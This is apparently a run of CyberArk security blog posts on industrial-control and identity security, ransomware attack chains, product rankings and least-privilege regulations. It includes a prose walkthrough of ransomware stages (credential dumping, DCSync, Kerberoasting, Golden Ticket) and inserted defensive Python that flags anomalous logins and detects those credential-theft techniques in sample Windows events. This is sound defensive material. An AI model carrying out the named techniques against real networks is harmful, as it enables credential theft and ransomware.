  • Securing and monitoring remote access to OT and IT networks is also critically important, since both internal and external users require access to ICS networks. This access increasingly involves remote connectivity sessions that can sometimes go unsecured and unmonitored for days or weeks. CISA and FBI authors recommend “limiting access to resources over networks, especially by restricting RDP. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require multi-factor authentication.”
  • Implementing application whitelisting (also known as “allowlisting”) can help mitigate the risk of malware-based attacks by “only allowing systems to execute programs known and permitted by security policy.” CISA and FBI authors write, “Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs.”

Unusual user activity or unauthorized credential use to access an ICS asset could also indicate signs of an attack. Understanding the context of a user’s actions helps add another layer of security. Users will typically interact with the company system at the usual time, accessing the usual files. Anything that breaks the pattern can be flagged, logged and blocked. It’s one thing to be logging on from California at 12 noon on your usual laptop to begin work. It’s another to be logging on at midnight from a foreign country using a desktop PC.
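The pattern check described above (usual time, usual device, usual location, usual asset) can be expressed as a per-user baseline plus a scoring rule. The following is an added example, not CyberArk’s code: it builds the baseline from constructed historical access events, scores new logins to ICS assets against it and maps the score to an action. User names, asset names, countries, devices, the point values and the thresholds are all assumptions chosen for illustration.

```python
"""Login-context anomaly checks over constructed ICS access events.

Added example (not CyberArk's code). Builds a per-user baseline from
historical logins and flags new logins that break the pattern: an
unusual hour, a new country, a new device or a first touch of an asset.
Every log line, user, asset and threshold below is constructed.
"""
from collections import defaultdict
from datetime import datetime

# Constructed history: user,timestamp(UTC),country,device,asset
HISTORY = """\
alice,2021-07-01T19:02:11Z,US,laptop-a1,hmi-plant-3
alice,2021-07-02T18:55:40Z,US,laptop-a1,hmi-plant-3
alice,2021-07-06T19:10:05Z,US,laptop-a1,historian-db
alice,2021-07-07T20:01:59Z,US,laptop-a1,hmi-plant-3
bob,2021-07-01T13:30:00Z,DE,laptop-b7,scada-gw-1
bob,2021-07-05T14:12:48Z,DE,laptop-b7,scada-gw-1
"""

# Constructed new logins to triage: same noon-ish pattern for alice,
# then alice "at midnight from a foreign country on a desktop",
# then bob from a device never seen before.
NEW_LOGINS = """\
alice,2021-07-08T19:05:00Z,US,laptop-a1,hmi-plant-3
alice,2021-07-09T00:03:00Z,FR,desktop-z9,hmi-plant-3
bob,2021-07-08T14:00:00Z,DE,laptop-b8,scada-gw-1
"""


def parse(text):
    """Turn the CSV-style lines into event dicts with a real datetime."""
    events = []
    for line in text.strip().splitlines():
        user, ts, country, device, asset = line.split(",")
        events.append({
            "user": user,
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "country": country,
            "device": device,
            "asset": asset,
        })
    return events


def build_baseline(events):
    """Per-user sets of hours, countries, devices and assets seen before."""
    base = defaultdict(lambda: {"hours": set(), "countries": set(),
                                "devices": set(), "assets": set()})
    for e in events:
        b = base[e["user"]]
        b["hours"].add(e["time"].hour)
        b["countries"].add(e["country"])
        b["devices"].add(e["device"])
        b["assets"].add(e["asset"])
    return base


def hour_is_typical(hour, seen_hours, slack=1):
    """True if `hour` is within `slack` hours of any seen hour (wraps at midnight)."""
    return any(abs(hour - h) <= slack or abs(hour - h) >= 24 - slack
               for h in seen_hours)


def score_login(event, baseline):
    """Score one login against the user's baseline; weights are assumptions."""
    b = baseline.get(event["user"])
    if b is None:
        return {"user": event["user"], "score": 100,
                "reasons": ["unknown user"], "action": "block"}
    score, reasons = 0, []
    if not hour_is_typical(event["time"].hour, b["hours"]):
        score += 30; reasons.append("unusual hour")
    if event["country"] not in b["countries"]:
        score += 40; reasons.append("new country")
    if event["device"] not in b["devices"]:
        score += 30; reasons.append("new device")
    if event["asset"] not in b["assets"]:
        score += 20; reasons.append("first access to asset")
    # Below 30: allow; 30-69: force step-up MFA; 70 and above: block and alert.
    action = "allow" if score < 30 else "step-up-mfa" if score < 70 else "block"
    return {"user": event["user"], "score": score, "reasons": reasons, "action": action}


def triage(history_text=HISTORY, new_text=NEW_LOGINS):
    """Score every new login and return the verdicts in input order."""
    baseline = build_baseline(parse(history_text))
    return [score_login(e, baseline) for e in parse(new_text)]


if __name__ == "__main__":
    for verdict in triage():
        print(verdict)
```

The baseline here is a plain set of seen values, which is enough to show the idea; a production version would age out old observations and treat a first-ever login from a new device as step-up rather than an outright block, so that legitimate hardware refreshes do not lock operators out of the plant.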

This guidance follows the Zero Trust cybersecurity model of “never trust, always verify” and helps organizations to secure individual identities — whether human or machine — throughout the cycle of accessing critical OT and IT assets. When identities can be authenticated accurately, authorized with the proper permissions and given access to privileged assets in a structured manner, organizations are better equipped to find attackers as they move throughout a network — and stop them before they can disrupt critical systems, threaten uptime and jeopardize consumer safety.

No Time to Waste

The U.S. Government has defined the critical infrastructure cybersecurity problem, outlined broad solutions and will soon deliver its recommendations. Private industry has work to do to meet those goals and, as Shackelford and Hart urged their Black Hat audience, the time to act is now, with or without federal government enforcement.

Living Off the Land Ransomware Attacks: A Step-By-Step Plan for Playing Defense
https://www.cyberark.com/blog/living-off-the-land-ransomware-attacks-a-step-by-step-plan-for-playing-defense/ (Tue, 10 Aug 2021 18:00:15 +0000)

It’s been a staple of horror movies and espionage thrillers for years — the idea that something innocuous or trusted could suddenly turn against you. Unfortunately, what’s fodder for great fiction can also easily become cybersecurity reality.

In the digital realm, among the lurking sources of angst are living off the land (LotL) ransomware attacks — of course, their folksy name belies their insidious danger. The recent Kaseya supply chain ransomware attack is just the latest example; threat actors used the organization’s own technology resources against them to scale their attack — a hallmark of LotL. By infiltrating an endpoint and then gaining access to tools that were supposed to be there, they were able to worm deeper into the multi-layered network environment without raising alarms. These kinds of attacks give hostile agents two things they covet: access and time. You don’t know they’re there — you don’t know what they’re doing — and you may not know what they take with them when they go.

While these LotL scenarios don’t always end with a ransomware attack, the two increasingly go hand in hand and are as difficult to assess as they are to prevent. An effective protection strategy begins with a solid grasp of what constitutes an LotL ransomware attack and how it can impact your organization.

Let’s first review a quick history and common LotL techniques and procedures before assuming an attacker’s role to best explain some of the many ways this could go down.

The Lay of the Malevolent Land

Around 2017, fileless malware attacks started to gain mainstream attention after reports of hostile infections of legitimate IT systems belonging to the Democratic National Committee and other large organizations emerged.

Fileless malware made LotL possible. By eliminating the need to store the malicious payload in a file or install it directly on a machine, attackers could slip past anti-virus and other traditional endpoint security tools and move laterally through the environment, escalating privileges and uncovering new levels of access, until they reached the ultimate prize: systems, applications and databases containing critical business assets such as customer data and intellectual property.

To linger in systems and “live off the land” without detection, fileless malware often poses as a trusted tool with high privileges and access — such as legitimate tools used by system administrators to automate tasks and manage configurations. This allows attackers to monitor the environment, dump credentials and essentially take their time poking around under the guise of whitelisted, or trusted, tools.

Identifying, let alone stopping, these attacks is extremely difficult — especially if you’re dealing with a sophisticated ransomware actor who’s specifically targeting your organization. This is when effective cybersecurity information sharing can make all the difference and why businesses around the world rely on MITRE ATT&CK, an open-source framework comprising a vast knowledge base of real-world adversarial tactics, techniques and procedures (TTPs), with a corresponding database that tracks the activities of numerous threat actors and cyber-criminal syndicates.

Just as the MITRE ATT&CK framework’s name implies, the system mimics the behavior of real-world attackers, which helps IT, information security and compliance organizations more effectively assess risk, identify security gaps and patch up vulnerabilities. By using a common taxonomy, security professionals, including SOC staff, red and blue teams, pen testers and security vendors, can easily exchange information and collaborate using the same language, ultimately strengthening cybersecurity strategies.

Know Thy Enemy

At the core of the ATT&CK system is the idea that cybersecurity experts need to think like attackers. Unlike other security frameworks that focus on the tools and malware used by malicious actors, ATT&CK focuses on how adversaries interact with systems during an attack — so that’s exactly what we’re going to do here. This will be an attempt at a kind of “how-to” guide, with the understanding that no two attacks are necessarily alike. The LotL path is not linear and has a bit of a “choose your own adventure” element to it. It’s about reading the environment and developing an approach based on what you find there.

Let’s start with the consistencies. Most LotL attacks follow a similar pattern: abuse identities to infiltrate an enterprise network, compromise systems, escalate privileges and move laterally until they gain access to the sensitive systems they need to execute their attack or push ransomware.

But within each step exist divergent paths that make tracking and anticipating such attacks so challenging. Using ATT&CK analysis, we can break down behaviors and red flags to look for within critical stages of an LotL ransomware attack to help speed detection and reduce exposure and damage:

Stage 1: Make First Contact

After pre-attack preparations — from reconnaissance to resource development — are complete, the attacker has myriad ways to establish an initial entry point into the network. Many rely on tried-and-true phishing techniques, while some gain access by injecting malicious code or cross-site scripting into an otherwise normal online browsing experience to open vulnerabilities — known as a “drive-by compromise.” Or, as seen frequently in recent months, attackers could manipulate software before it reaches their targeted final consumer in a supply chain attack. Any one of these techniques — or a combination of more than one — will open the door.

Stage 2: Run Your Executables

Once inside, the ransomware attacker’s goal is to run the malicious code, and there are many options for doing so: abusing popular IT admin tools to issue commands and execute processes, or exploiting the uniform environments that give remote and local access to corporate systems, which can open attack pathways. Additionally, as seen in the SolarWinds supply chain attack, adversaries can modify source code and push a seemingly innocuous security update that is actually the malware in disguise.

Stage 3: Maintain the Foothold

This is the stage when LotL truly becomes LotL — when the attacker sets up shop and takes full advantage of the time and anonymity their techniques afford them. At this stage, the attacker may create their own accounts to maintain access to victim systems, or use boot or logon autostart execution to run programs automatically whenever a system starts, in order to maintain persistence or gain more powerful privileges on compromised systems while they go about their slow and deliberate work.

Stage 4: Take It Up a Notch

Now that the attacker is settled in, it’s time to gain higher-level permissions. Many attackers go for domain account credentials — particularly those of domain administrators, who have far-reaching access to Tier 0 systems like Active Directory — and favor service accounts linked to non-human identities, since those passwords are changed infrequently. Through techniques like OS credential dumping, attackers obtain and discard login information as they creep closer to the keys for the most powerful systems. Again, this is all conducted under the guise of “legit” accounts and tools to evade defenses.

Stage 5: Forge an All-Access Pass

With domain admin privileges in hand, the attacker can stealthily manipulate domain controllers, pulling password data from Active Directory by running DCSync, which may yield current and historical hashes of potentially useful accounts, or by accessing Local Security Authority (LSA) secrets for service account information. One technique, “Kerberoasting,” can be used to crack passwords offline. Attackers can also try to perform a Kerberos authentication “Golden Ticket” attack, which can lead to a complete network takeover and massive business disruption.

Stage 6: Move with Ease to Accomplish the Goal

Now free to move without resistance or fear of detection, the attacker focuses on lateral movement to leave no digital stone unturned. Their forged Kerberos keys allow them to “pass the ticket,” circumventing security and access controls while they search for data to mine and wait for the perfect moment — often when the victim organization is most vulnerable — to exfiltrate sensitive data and then encrypt files and demand a ransom. In other instances, the attacker may use valid accounts to interact with a remote network share using Server Message Block (SMB), allowing them to perform actions, purportedly as the logged-on user, to accomplish their goals.
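As an added example (not part of the original post), the following Python sketches how a defender might turn the Stage 3 and Stage 5 behaviors above into detections over Windows Security events: account creation for persistence, DCSync-style replication requested by a non-domain-controller principal, and Kerberoasting (a burst of RC4-encrypted service-ticket requests). The event records are constructed samples, the alert threshold is an assumption, and the replication GUIDs are the documented Active Directory extended rights.

```python
"""Defender-side detections for the Stage 3 and Stage 5 behaviours described above.
All event records below are constructed samples, not real log data."""

# Documented Active Directory extended-right GUIDs that permit directory replication.
# A 4662 event exercising one of these from a non-DC account is the classic DCSync signal.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
RC4_HMAC = "0x17"          # Kerberos etype favoured by offline-cracking tooling
KERBEROAST_THRESHOLD = 3   # assumed: distinct SPNs per account before alerting

# Constructed sample events (a few fields from Windows Security log records).
SAMPLE_EVENTS = [
    # Normal DC-to-DC replication: the requester is a domain controller machine account.
    {"EventID": 4662, "SubjectUserName": "DC02$", "Computer": "DC01",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A workstation user exercising replication rights on the domain object.
    {"EventID": 4662, "SubjectUserName": "jsmith", "Computer": "DC01",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Service-ticket requests: AES (0x12) is normal; RC4 for several SPNs is not.
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "MSSQLSvc",
     "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17"},
    # Stage 3: a new account created by an ordinary user rather than a provisioning process.
    {"EventID": 4720, "SubjectUserName": "jsmith", "TargetUserName": "svc_helpdesk2"},
]


def is_machine_account(name: str) -> bool:
    """Computer accounts (including domain controllers) end with '$'."""
    return name.endswith("$")


def detect_dcsync(events, allowlist=frozenset()):
    """Stage 5: replication rights exercised by a principal that is not a DC.
    Legitimate non-DC replicators (directory sync service accounts) belong in the allowlist."""
    alerts = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        guids = {g.strip("{}").lower() for g in e.get("Properties", "").split()}
        who = e["SubjectUserName"]
        if guids & REPLICATION_GUIDS and not is_machine_account(who) and who not in allowlist:
            alerts.append(("DCSync (T1003.006)", who, e["Computer"]))
    return alerts


def detect_kerberoasting(events, threshold=KERBEROAST_THRESHOLD):
    """Stage 5: one account requesting RC4 service tickets for many distinct SPNs."""
    spns_by_user = {}
    for e in events:
        if e.get("EventID") != 4769 or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if is_machine_account(svc) or svc.lower() == "krbtgt":   # not crackable service SPNs
            continue
        spns_by_user.setdefault(e["TargetUserName"], set()).add(svc)
    return [("Kerberoasting (T1558.003)", user, f"{len(spns)} RC4 service tickets")
            for user, spns in spns_by_user.items() if len(spns) >= threshold]


def detect_account_creation(events):
    """Stage 3: account creation, to be reconciled against approved provisioning."""
    return [("Create Account (T1136)", e["SubjectUserName"], e["TargetUserName"])
            for e in events if e.get("EventID") == 4720]


def run_detections(events):
    """Return (technique, principal, detail) tuples for every rule that fired."""
    return detect_dcsync(events) + detect_kerberoasting(events) + detect_account_creation(events)


if __name__ == "__main__":
    for technique, principal, detail in run_detections(SAMPLE_EVENTS):
        print(f"{technique:28} {principal:22} {detail}")
```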

So now that we’ve seen a few pages of the opponent’s playbook, what can we do about it? With so many proven techniques at attackers’ disposal, it can be challenging to figure out how to address areas of vulnerability or where to begin. Devising an effective ransomware protection strategy mapped to the MITRE ATT&CK framework requires organizations to investigate areas across the attack chain that present the highest levels of risk and prioritize them accordingly. But when it comes to mitigating the damage done by LotL attacks, stage one is typically the place to start.

A multi-layered endpoint security approach combining least privilege defense, strong authentication for identities, credential theft protection, application control and ransomware blocking will make it significantly harder for attackers to gain entry and maintain persistence. For once they get a foothold, it becomes increasingly easy for them to cover their tracks and scale their efforts.

As recent history shows, it may be impossible to completely wall off your “land,” but you can make it a lot more inhospitable to those seeking to plunder it.

Introducing the CyberTalk with CyberArk Podcast Series: On-the-Go Cybersecurity Insights
https://www.cyberark.com/blog/introducing-the-cybertalk-with-cyberark-podcast-series-on-the-go-cybersecurity-insights/ (Wed, 04 Aug 2021 13:00:12 +0000)

Ninety-one percent of cybersecurity practitioners agree they must keep up with their skills, or the organizations they work for are at a significant disadvantage against today’s cyber adversaries, according to a new Information Systems Security Association (ISSA) survey. Yet, digging into the latest headlines and continuously learning and training is tough when your days are full and your job description seems to expand daily.

You need timely, digestible insights — in-between meetings, on the road or during your morning run. Our new 12-part podcast series, CyberTalk with CyberArk, hosted by Cybercrime Magazine, delivers just that.

The first two episodes are available now. New tracks featuring CyberArk researchers and thought leaders drop every other Tuesday — so subscribe today!

Why and How Organizations Need to Implement Identity Security

Imagine your organization is under attack, and the clock is ticking. But since your adversary has privileged access to every endpoint and system and can impersonate any identity within your environment, you don’t even know you’re being targeted. Can you protect your most critical assets?

In the inaugural episode of CyberTalk, CyberArk Founder, Chairman and CEO Udi Mokady joins host Hillarie McClure to explore the evolving threat landscape and new identity battleground. He breaks down what Identity Security means, why it matters and what clear steps organizations can take to mitigate risk and build cyber resilience.

By embracing a Zero Trust mindset and assuming that any identity — human or machine — in your network may have been compromised, you can turn your attention to identifying, isolating and stopping attacks before they can do harm. Tune in to the full episode to learn more.

Identity Access Management and the Ransomware Connection

Part of having the “coolest job at CyberArk” involves teaching security practitioners how to apply cutting-edge research to their own cybersecurity programs, so they can think like attackers and stay one step ahead.

In this episode, CyberArk Technical Evangelist Andy Thompson deconstructs recent major ransomware attacks and identifies the common denominator across them all: the compromise of identity and subsequent manipulation of privileged credentials. He uncovers findings from CyberArk Labs’ extensive analysis of more than 3 million ransomware samples and outlines proven mitigation techniques to help stop ransomware in its tracks. Catch the full podcast here.

Don’t Miss an Episode — Follow Cybercrime Magazine on SoundCloud

In the next CyberTalk with CyberArk podcast available August 10, get trending threat research insights from Lavi Lazarovitz, head of CyberArk Labs. Then, it’s back to school with Matt Kenslea on August 24. He’ll discuss top-of-mind Identity Security considerations for educational institutions, along with state and local government entities.

Find and follow the Cybercrime Magazine podcast for on-demand episodes on SoundCloud or wherever you get your podcasts.

Ransomware Protection, a Gold-Medal Team Approach
https://www.cyberark.com/blog/ransomware-protection-a-gold-medal-team-approach/ (Fri, 30 Jul 2021 13:00:50 +0000)

If the cybersecurity industry were to adopt a motto, the Summer Games’ 2021 “Faster, Higher, Stronger — Together” adaptation should serve as inspiration. As high-profile ransomware attacks continue unabated, the need for a collaborative and unified security approach has never been greater.

Combating today’s advanced cyber threats requires a powerful combination of deep security expertise, diverse experience, shared intelligence, proven processes and defense-in-depth tools — something no single vendor can fully address. That’s why cybersecurity needs to be tackled as a “team game,” and organizations have a vested interest in partnering with one another to build upon strengths and deliver holistic solutions that help defenders stay a step ahead.

At CyberArk, this belief is a foundational tenet in our approach to building technology partnerships that deliver long-term value to our customers. And our C3 Alliance is proof of this ongoing commitment. Today, we have more than 100 certified partnerships with leading providers of enterprise software, infrastructure and security solutions — all featured on the CyberArk Marketplace. This team game mindset is also why we’re part of the Identity Defined Security Alliance (IDSA), a growing community dedicated to helping organizations reduce the risk of breach by combining identity and security strategies.

Training for the Big Game… Ransomware Hunt

Security teams aren’t the only ones preparing for the main event — the inevitable breach. With an eye on the prize, attackers are just as busy innovating and forging alliances. Take ransomware attackers, for example. To accomplish large-scale, targeted campaigns, often referred to as “big-game hunting,” they need to put in the work in advance, pooling necessary resources, doing reconnaissance on their intended victim organization (often for months or even years) and meticulously social engineering specific individuals with direct access to critical assets and systems.

In the following ransomware attack chain example, the attackers’ goal is to hold a global financial service organization’s highest value data hostage through encryption and then execute a double-extortion attack by planting a hidden back door. It’s a sophisticated sequence, but one that’s growing in popularity. Here are the four attack steps they need to “stick the landing”:

  1. Deliver ransomware on the endpoint. The attackers use social engineering tactics to identify their targets — which include highly privileged Microsoft Windows and macOS administrator accounts — then phish for poorly protected credentials to gain an initial foothold. This is relatively easy to accomplish since maintaining visibility of dynamic admin privileges on endpoints is a challenge for many organizations, while managing them securely without hindering productivity is notoriously difficult.
  2. Escalate privileges and fortify access. Once inside, the attackers move between identities, applications and systems to uncover new levels of privileged access to plant and execute the code. They also take evasive action, disabling existing endpoint security and security monitoring tools where possible so they can search for more machines and sensitive data.
  3. Maximize attack impact. As the ransomware propagates, the attackers disrupt backups, delete shadow copies and unlock files to maximize the impact of the attack — while leaving hidden identities and a back door for future data extortion.
  4. Execute ransomware. The attackers accomplish this by using read/write permissions to encrypt files, holding them captive and demanding a sky-high ransom, knowing that the organization is highly motivated to pay because of downtime sensitivities.

Fighting Ransomware with a Team Approach

To outperform their adversaries, defenders must do more than just find and block the malware itself. A winning approach to ransomware protection also involves controls and methods that stop attackers from gaining and using powerful privileges to do harm — at every point in the attack chain. This takes a collaborative team effort.

Strong security at the endpoint involves an endpoint detection and response (EDR) solution. EDR technology has come a long way in recent years, and can capture endpoint activity through continuous monitoring, deliver visibility and in-depth analysis and accelerate security operations efforts. According to a 2021 SANS survey, 51.6% of compromises were detected by EDR solutions. And yet, these tools are not designed to specifically look at and securely manage identity and privilege — on which many ransomware attacks depend.

That’s where a reliable teammate who’s trained hard and proven their value comes in: CyberArk Endpoint Privilege Manager (and yes, we can keep this Summer Games analogy going all day long). Designed to substantially reduce the identity-related attack surface presented by distributed endpoints, CyberArk Endpoint Privilege Manager combines least privilege defense, credential theft protection, application control and ransomware blocking. This creates an environment in which other security solutions can play their roles more effectively.

In our example attack above, EDR could recognize and stop known ransomware, while prioritizing alerts and fast-tracking investigation and response efforts. For strains evading detection, CyberArk Endpoint Privilege Manager would make it difficult for attackers to gain an initial foothold by automatically removing admin accounts left on endpoints — while blocking attempts to steal credentials cached by web browsers, password managers, single sign-on solutions and other programs.

If any ransomware managed to get through, CyberArk Endpoint Privilege Manager’s strong application controls would allow it to run only under certain conditions, with set policies around read, write and modify capabilities. Meanwhile, lateral movement would be restricted by multi-factor authentication (MFA), and strong least privilege enforcement would inhibit further propagation and damage. What’s more, the attackers’ chances of building (and successfully hiding) a back door would be significantly reduced.

This dynamic duo also works in concert to help organizations mitigate the risk of future attacks. CyberArk Endpoint Privilege Manager produces valuable intelligence on privilege abuse attempts, which can be used to extend EDR solutions’ capabilities so endpoint attacks can be identified and blocked before impact.

Endpoint Security Team Approach

Getting Ransomware-Ready

“All organizations must recognize that no company is safe from being targeted by ransomware, regardless of size or location,” wrote U.S. Deputy National Security Advisor for Cyber and Emerging Technology Anne Neuberger in a recent memo.

Of course, getting ransomware-ready doesn’t end with beefing up your organization’s integrated security toolkit. Ongoing cybersecurity training, bidirectional information sharing, adherence to strong cybersecurity fundamentals and frameworks and a strong focus on data hardening are also essential elements of a multi-layered strategy.

“To understand your risk, business executives should immediately convene their leadership teams to discuss the ransomware threat and review corporate security posture and business continuity plans to ensure you have the ability to continue or quickly restore operations,” Neuberger wrote.

And cybersecurity companies play a critical role in helping organizations prepare. By embracing a team approach — and working together in solidarity — our industry as a whole can drive more responsible, accountable and effective control of the digital IT environment. That helps organizations combat evolving ransomware threats and gives them the security confidence to achieve their own gold-medal goals.

Stopping Cyber Threats with Unstoppable Innovation
https://www.cyberark.com/blog/stopping-cyber-threats-with-unstoppable-innovation/ (Mon, 26 Jul 2021 13:00:25 +0000)

Several powerful and unforeseen market forces are driving the need for new, innovative approaches to combat evolving cyber threats. Central to achieving this critical mission is securing privileged access — the common thread woven across all of today’s most devastating attacks.

According to Gartner, “Privileged Access Management (PAM) continues to be a top-ten security control, and recent highly visible cybersecurity incidents in the news have demonstrated that the impact of breaches are not just online, but have spilled into the physical world. As such, PAM tools are crucial for mitigating these risks.” [1]

The pandemic dramatically accelerated the rate of change organizations experienced, with many fundamentally transforming the way they do business — from the inside out. This is evidenced in the widespread migration of workloads from self-hosted data centers to third-party hosted public clouds, and rapid rise in “born-in-the-cloud” enterprises. In these hybrid and multi-cloud IaaS environments, the very nature of privileged access risk has changed, driving many organizations to seek new ways to secure permissions and entitlements for human and machine identities to access critical cloud resources — and many industry players to include such solutions in their future product roadmaps.

Today, CyberArk is the only vendor to offer a cloud infrastructure entitlements management (CIEM) solution within its Privileged Access Management portfolio. CyberArk Cloud Entitlements Manager is an AI-powered SaaS solution that delivers measurable risk reduction by implementing least privilege across cloud environments.

The shift to DevOps and recent surge in digital supply chain attacks has led to new requirements for advanced Privileged Access Management solutions. There’s a critical need to secure the development pipeline as well as build time and run environments without burdening software developers. On this front, we continue to deliver security at the speed of innovation.

CyberArk received the highest score for the “Secrets Management” use case in the “2021 Gartner® Critical Capabilities for Privileged Access Management report.” [2] Our DevOps secrets management solutions enable applications and automation tools to securely access sensitive resources at scale. We continue to focus on DevSecOps and developer enablement, further expanding our robust integrations with DevOps tools and support for complex use cases.

Our Commitment to Continuous Innovation and Passion for Security Excellence

Innovation is in our DNA at CyberArk, and we’re significantly investing in product evolution while reimagining how we engage with and support our customers as they face increasingly complex business challenges and cyber threats.

From our transition to a subscription business model to our new cloud-native offerings, to the expanded number of access-, privilege- and secrets-related use cases we address, to our extensive integration ecosystem of more than 700 strategic partners (and counting), we continue to deliver on our Identity Security vision and drive value and results for our customers.

2021 Gartner® Magic Quadrant for PAM: The Results Are In

For the third time running, CyberArk has been named a Leader in the “2021 Gartner® Magic Quadrant™ for Privileged Access Management.” [3] CyberArk was positioned both highest in ability to execute and furthest in completeness of vision.

Having been named a Magic Quadrant Leader in PAM for the past three years, with a history of consistent delivery and execution of product innovation and business stability, we keep PAM at the heart of our Identity Security strategy. We believe that, while other vendors experience growing pains and product-line consolidation challenges post-acquisition, our unwavering growth and accelerating business momentum continue to extend this foundational strength. We deliver unmatched customer satisfaction while boosting operational efficiencies and driving down cybersecurity risk – at scale.

From best-in-class credential management and privileged task automation, to advanced Just-in-Time functionality, numerous Privileged Access Management capabilities within the end-to-end CyberArk Identity Security Platform are positioned in the Gartner companion report, “2021 Critical Capabilities for Privileged Access Management.” [4] Out of the 10 vendors evaluated, CyberArk received the highest technical score for the “Global Enterprises,” “Midsize and Large Enterprises,” “Secrets Management,” and “Privileged Account and Session Management” use cases.

The breadth and depth of the CyberArk portfolio of SaaS-delivered and advanced on-premises offerings is unmatched. And since this evaluation was completed, we’ve continued to drive momentum in the market by unveiling new cloud solutions and shared services to help global organizations secure high-risk access, broaden protection across cloud and hybrid environments and achieve a Zero Trust-based approach to protecting human and machine identities.

We are honored by this recognition and would like to thank our customers around the world, who have demonstrated heroic resilience during this sustained period of challenges, along with our partners and employees who continue to both impress and humble us for their unwavering dedication and pursuit of security excellence. You are the cornerstone of our success and we are grateful for each of you.

Download your complimentary report copies of the 2021 Gartner® Magic Quadrant™ for Privileged Access Management and 2021 Gartner Critical Capabilities for Privileged Access Management to learn more.


[1], [2], [4] Gartner, 2021 Gartner Critical Capabilities for Privileged Access Management, Felix Gaehtgens, Abhyuday Data, Michael Kelley, Swati Rakheja, 19 July 2021

[3] Gartner, 2021 Gartner Magic Quadrant for Privileged Access Management, Felix Gaehtgens, Abhyuday Data, Michael Kelley, Swati Rakheja, 19 July 2021

Gartner Disclaimers

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Gartner and Magic Quadrant are registered trademarks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

Reduce Cloud Compliance Risk with Least Privilege
https://www.cyberark.com/blog/reduce-cloud-compliance-risk-with-least-privilege/ (Fri, 23 Jul 2021 13:00:41 +0000)

Meeting regulatory compliance requirements is one of global organizations’ top challenges as they scale cloud deployments and embrace multi-cloud strategies to drive business efficiencies. The burgeoning number of identities within public cloud environments is a major contributor to this massive compliance conundrum. Every single human and machine identity in a cloud environment can be configured with thousands of different permissions to access workloads containing sensitive information — from intellectual property to customer data.

Excessive Permissions Create Cloud Security and Compliance Risks

Excessive, unused and misconfigured cloud permissions expose organizations to the risk of a data breach, which costs organizations an average of $3.86 million, according to Ponemon Institute and IBM research. And according to the same research, cloud-specific breaches cost even more, at $4.41 million on average. Compliance violations and financial penalties are becoming an even greater part of overall breach cost, thanks to tightening cybersecurity regulations and oversight around the world.

Seven Regulatory Frameworks that Require Least Privilege

An attacker controlling an identity with excessive permissions can steal or reach sensitive information easily, often without detection. Because of this — and regardless of your organization’s industry or geographic location — one thing regulatory bodies, industry frameworks and public cloud service providers all emphasize is the need for least privilege enforcement. Working to continuously ensure that all identities have the minimum permissions necessary to perform their duties is a fundamental best practice for reducing risk exposure and is aligned with a Zero Trust security approach.

Here’s a look at seven select frameworks that require least privilege:

1. SWIFT Customer Security Controls Framework. Financial institutions in the Society of Worldwide Interbank Financial Telecommunication (SWIFT) must routinely comply with Mandatory Security Control #5, “Logical Access Controls.” SWIFT members must self-attest that they “enforce the security principles of need-to-know access, least privilege and segregation of duties for operator accounts.”

2. Payment Card Industry Data Security Standard (PCI DSS). Per PCI DSS Requirement 7, businesses managing cardholder data must “ensure critical data can only be accessed by authorized personnel, systems and processes must be in place to limit access based on need to know and according to job responsibilities.” The regulation continues, “Need to know is when access rights are granted to only the least amount of data and privileges needed to perform a job.”

3. National Institute of Standards and Technology (NIST) Framework for Improving Critical Infrastructure Cybersecurity. NIST states in PR.AC-4: “Access permissions and authorizations [should be] managed, incorporating the principles of least privilege and separation of duties.”

4. American Institute of Certified Public Accountants’ SOC for Cybersecurity. Organizations developing software applications and pursuing SOC I or SOC II certifications must complete attestations of their compliance with AICPA Trust Services Criteria. SOC I or SOC II certification requires “the entity authorizes, modifies, or removes access to data, software, functions, and other protected information assets based on roles, responsibilities, or the system design and changes, giving consideration to the concepts of least privilege and segregation of duties, to meet the entity’s objectives.”

5. Health Insurance Portability and Accountability Act (HIPAA). Key HIPAA components such as the Privacy Rule and Security Rule place firm restrictions on unnecessary access to protected health information (PHI) and limit all access to the “minimum necessary” standard. For example, the HIPAA Privacy Rule states that covered entities “must develop and implement policies and procedures that restrict access and uses of protected health information based on the specific roles of the members of their workforce.”

6. General Data Protection Regulation (GDPR). The European Union’s GDPR Article 25 stipulates businesses must proactively implement “Technical and organizational measures for ensuring that, by default, only personal data which are necessary for each specific purpose… are processed.” In other words, organizations must proactively restrict unnecessary access to personal data to comply with GDPR.

7. California Consumer Privacy Act (CCPA). The CCPA specifies in Section 11 that “Any consumer whose nonencrypted or nonredacted personal information… is subject to an unauthorized access and exfiltration, theft, or disclosure as a result of the business’s violation of the duty to implement and maintain reasonable security procedures and practices… to protect the personal information may institute a civil action…” Under CCPA, penalties are variable and businesses who expose large amounts of consumer data through insufficient access controls could face significant penalties.

